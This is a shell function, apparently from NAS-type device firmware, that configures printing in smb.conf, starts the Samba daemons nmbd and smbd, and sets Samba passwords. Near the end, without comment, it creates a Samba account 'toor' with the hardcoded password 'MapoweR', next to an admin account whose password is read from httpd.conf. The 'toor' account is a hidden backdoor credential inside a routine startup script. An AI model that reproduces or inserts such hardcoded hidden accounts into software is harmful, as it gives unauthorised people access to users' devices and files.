service_smb_start(){
PASSWD_PROG=/usr/local/samba/sbin/smbpasswd
SMB_CONF=/etc/sysconfig/config/smb/smb.conf

/bin/cat $SMB_CONF| /bin/grep -q "printcap"
[ $? -eq 0 ] || {
 /bin/sed '/passdb expand/ a printcap name = /etc/lprng/printcap\
load printers = yes\
printing = lprng' $SMB_CONF > /tmp/.smb1
 /bin/mv /tmp/.smb1 $SMB_CONF
 }
      
/usr/local/samba/sbin/nmbd
 [ $? -eq 0 ] &&\
  /bin/logger "$0 - nmbd deamon Start Succeed" ||\
  /bin/logger "$0 - nmbd deamon Start Failed"

/bin/nice -n +10 /usr/local/samba/sbin/smbd
[ $? -eq 0 ] &&\
 /bin/logger "$0 - smbd deamon Start Succeed" ||\
 /bin/logger "$0 - smbd deamon Start Failed"

admin_pass=`/bin/cat /etc/sysconfig/config/httpd.conf|/bin/awk "-F:" '{print $3}'|/bin/sed 's/\ //g'`
(echo "MapoweR";echo "MapoweR")|${PASSWD_PROG} -s -a toor
(echo "${admin_pass}";echo "${admin_pass}")|${PASSWD_PROG} -s -a admin

}
